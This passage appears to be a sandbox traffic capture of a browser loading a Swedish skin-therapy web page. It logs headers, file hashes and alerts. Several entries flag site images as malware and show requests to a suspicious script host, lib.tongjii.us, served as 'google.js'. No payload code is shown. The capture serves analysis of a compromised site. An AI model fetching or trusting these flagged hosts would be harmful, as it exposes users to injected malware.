User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

                                         
Response from 195.74.38.68:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sat, 22 Jul 2017 09:38:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:39GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3206
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3206
Md5:    0b5ac40bab49cd300d2c6bfdf1e0e54a
Sha1:   e24c8aead8a5e09a874f9e06c7119d806216dc0f
Sha256: ecdd81412aea8f3f847367a002c8d2ca00ec45ef86eddf77bc6b805917352a5b

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
Request:
GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1
Host: lib.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
If-Modified-Since: Wed, 19 Jul 2017 10:52:41 GMT
If-None-Match: "596f39f9-248"

                                         
Response from 103.230.122.162:
HTTP/1.1 304 Not Modified
Server: nginx
Date: Sat, 22 Jul 2017 09:35:44 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"


--- Additional Info ---

GET /click/cookie.php?names=tb_cps&jsoncallback=jsonp1500716278095&_=1500716280063 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    039ab09066802f4288c1a8a9302d5890
Sha1:   0fad5ea4953737b88d7b7670e820228c68dc0725
Sha256: b6e080c064c313315fae04e93c00d80352740078bb14be5ac279f10cab0594d6

GET /click/cookie.php?names=sbj_tiao||sbj_jd&jsoncallback=jsonp1500716278094&_=1500716280057 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    b1833a1c13acea9cb622b6283ccfa478
Sha1:   6fde851278ca6fd8e7f1ffdfb730a5acb3d1a6e2
Sha256: e77fe1e16b07620b8933af7558b9eb1eb20774585f57e0d99444d2bd5c4843ef

GET /click/cookie.php?names=tb_qq&jsoncallback=jsonp1500716278096&_=1500716280067 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Sat, 22 Jul 2017 09:38:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:00 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    782679cb22700ad91e70fb42a0f1163b
Sha1:   4497886292e486cab4cd48a9ed8a80fac19c4058
Sha256: 707d54238f7f7be1156c75142a524f8f7d693ccae1148eb0770c65fc82b3436c

GET /upl/small/fasad1234.jpg/ HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Sat, 22 Jul 2017 09:38:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:40GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3645
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3645
Md5:    85671cfae72c10403e2dacf7be994e2e
Sha1:   f6967593ecfaad801ce858a1aabae538d1dd0d19
Sha256: 15a45fd9463b3d29ef5f596bf36241cc532c9b82b251c8ce9e0743ea1f36bba8

Alerts:
  Blacklists:
    - fortinet: Malware

GET /click/cookie.php?name=sbj_tiao&save=1&jsoncallback=jsonp1500716278097&_=1500716281031 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: iscookiesName=1

106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Sat, 22 Jul 2017 09:38:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600 sbj_tiao=1; expires=Sat, 22-Jul-2017 21:38:01 GMT; Max-Age=43200 statusName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    bce34fa5b0d0431e098db6e4bdafa281
Sha1:   021a5c4bb11b0f8c116c705ccd7edd28dc2c7792
Sha256: 5377b558348ab816fcd0d8c718f76c01eef0ea8c7b4cc930a8314138d19d07e0

GET /click/cookie.php?name=tb_cps&times=6&save=1&jsoncallback=jsonp1500716278098&_=1500716281036 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: iscookiesName=1

106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Sat, 22 Jul 2017 09:38:01 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600 tb_cps=1; expires=Sat, 22-Jul-2017 15:38:01 GMT; Max-Age=21600 statusName=1; expires=Sat, 22-Jul-2017 10:38:01 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    eca28808378a2069a7d96186190c4e89
Sha1:   f0b4d4feac342519db80194384d53a945f4054e7
Sha256: 85678bf6bc942785bb8b936efd00fc3972fc0c8d67c167bb323638e96f576d25

GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1
Host: lib.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
If-Modified-Since: Wed, 19 Jul 2017 10:52:41 GMT
If-None-Match: "596f39f9-248"

103.230.122.162
HTTP/1.1 304 Not Modified
Server: nginx
Date: Sat, 22 Jul 2017 09:35:45 GMT
Last-Modified: Wed, 19 Jul 2017 10:52:41 GMT
Connection: keep-alive
Etag: "596f39f9-248"


--- Additional Info ---

GET /iplookup/iplookup.php?format=js&_=1500716281315 HTTP/1.1
Host: int.dpool.sina.com.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

180.149.138.197
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Sina
Date: Sat, 22 Jul 2017 09:38:01 GMT
Content-Length: 143
Connection: close
DPOOL_HEADER: tyr105
Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: skuld143


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   143
Md5:    351247e451bbb4433a64a2a0b048b3af
Sha1:   3e58a14d1850dc54f2207daec6ef6e652fde1f03
Sha256: e0aa1b242087dab772bd1b038283611e3de00d8e216d5c090315147255ac4354

Alerts:
  IDS:
    - ET POLICY External IP Lookup sina.com.cn

GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:38:02 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:38:01 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc

GET /upl/small/5PV_logo.gif/ HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sat, 22 Jul 2017 09:38:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Cache-Control: max-age=9999, must-revalidate
Expires: Sat, 22 Jul 2017 12:24:41GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3206
Keep-Alive: timeout=5, max=199
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  data
Size:   3206
Md5:    0b5ac40bab49cd300d2c6bfdf1e0e54a
Sha1:   e24c8aead8a5e09a874f9e06c7119d806216dc0f
Sha256: ecdd81412aea8f3f847367a002c8d2ca00ec45ef86eddf77bc6b805917352a5b

Alerts:
  Blacklists:
    - fortinet: Malware

GET /imp?type(js)pool(450314)a(1978982)010162219 HTTP/1.1
Host: impse.tradedoubler.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

52.18.12.209
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Sat, 22 Jul 2017 09:38:01 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: BT=1z11zzRGzRuSnqzZY7Q4tVzzAx1z9yZY7Q4tV;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com UI=1z11zzRGz1TMZiXzJWhyAfwc;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PL=1z11zzRGzaNGl6z2Ho2yEV2UyBmkQyy-3FiO48y33iW0w1;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1

GET /imp?type(js)pool(450314)a(1978982)695183832 HTTP/1.1
Host: impse.tradedoubler.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: BT=1z11zzRGzRuSnqzZY7Q4tVzzAx1z9yZY7Q4tV; PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ; UI=1z11zzRGz1TMZiXzJWhyAfwc; PL=1z11zzRGzaNGl6z2Ho2yEV2UyBmkQyy-3FiO48y33iW0w1

52.18.12.209
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Sat, 22 Jul 2017 09:38:01 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: PI=1z11z1zRGzoVMq9z9bU4y1y1PQ06y1eGbyyy233yKCZy25o3PByyy2BLQ;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com PL=1z11zzRGzaNHDNz2Ho2yEV2UyBmkQyy-3FiO48y33iW0w2;expires=Sun, 22-Jul-2018 09:38:02 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1

GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/
Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4

82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=E7B846146AD42F1324A3581F5E624CADBEDCA5D4; Domain=.adtraction.com; Expires=Tue, 21-Jul-2020 09:38:02 GMT; Path=/
Content-Length: 19
Date: Sat, 22 Jul 2017 09:38:02 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc

GET /ga.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Sat, 22 Jul 2017 09:32:41 GMT
Expires: Sat, 22 Jul 2017 11:32:41 GMT
Last-Modified: Tue, 06 Jun 2017 00:25:39 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 16022
Age: 321
Cache-Control: public, max-age=7200


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16022
Md5:    09889dfa1a6bf800507b7a6799c45901
Sha1:   51b1c3f117a0874b6e5ea58bf9e8863c918db4aa
Sha256: 1c92948832be823e16d40195f5f66135368b5cb3f8a7833c3e25f558f16fecfb

GET /r/__utm.gif?utmwv=5.6.7&utms=1&utmn=185614914&utmhn=hudterapeuter.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x737&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Hudterapeuter%20med%20behandlingar%20i%20Ansiktsmassage%20i%20hela%20Sverige.&utmhid=1338783490&utmr=-&utmp=%2Fhudterapeuter%2Fansiktsmassage%2F&utmht=1500716283379&utmac=UA-8590313-3&utmcc=__utma%3D105502362.308285986.1500716283.1500716283.1500716283.1%3B%2B__utmz%3D105502362.1500716283.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1009380355&utmredir=1&utmu=DAAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

216.58.211.142
HTTP/1.1 200 OK
Content-Type: image/gif
Access-Control-Allow-Origin: *
Date: Sat, 22 Jul 2017 09:38:03 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015

GET /bilder/gymgrossisten/TD/bs_140x350.gif HTTP/1.1
Host: www.gymgrossisten.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/hudterapeuter/ansiktsmassage/

104.123.147.187
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache
Etag: "5eb1946de8b76ed4faa6fff311a5b582:1483950069"
Last-Modified: Mon, 09 Jan 2017 08:21:09 GMT
Accept-Ranges: bytes
Content-Length: 33079
Date: Sat, 22 Jul 2017 09:38:03 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 140 x 350
Size:   33079
Md5:    5eb1946de8b76ed4faa6fff311a5b582
Sha1:   8950df3523ad121924cfbff594201cd9386af0d1
Sha256: f9920db9a3a329a4e1e4f5010f9e5afbf52a3f2d4b32e9b2868b4303d4ef3aa3

GET /img/Girls_Massage_015223_BW.jpg HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hudterapeuter.com/styles.css

195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Sat, 22 Jul 2017 09:38:02 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:47 GMT
Etag: "463bd79-3e2cf-4fe4f0b0a7cf6"
Accept-Ranges: bytes
Content-Length: 254671
Keep-Alive: timeout=5, max=198
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   254671
Md5:    7e9d1899b2a25bf1938f3193503476f1
Sha1:   69c8bb25bc72efa15e8fc5db6dbffacc44f0beb6
Sha256: 14a08ffd947d50ad3bcc806a338afe6132cf0a9b1668008f9628b3a8b58bd138

GET /favicon.ico HTTP/1.1
Host: hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; __utma=105502362.308285986.1500716283.1500716283.1500716283.1; __utmb=105502362.1.10.1500716283; __utmc=105502362; __utmz=105502362.1500716283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 22 Jul 2017 09:38:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text
Size:   10686
Md5:    69f7e10f93efcddae55ceb77f225c1c6
Sha1:   51df6f20068bd672dd975afa5f695904b589e4c2
Sha256: 5049d3ea5116bc22738fa2b04aa85c91def839d36d35f6404d01ba5c7173bd4f

GET /favicon.ico HTTP/1.1
Host: hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=i7he46289d4vqbh5641kkudgl5; __utma=105502362.308285986.1500716283.1500716283.1500716283.1; __utmb=105502362.1.10.1500716283; __utmc=105502362; __utmz=105502362.1500716283.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 22 Jul 2017 09:38:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.4.7 80


--- Additional Info ---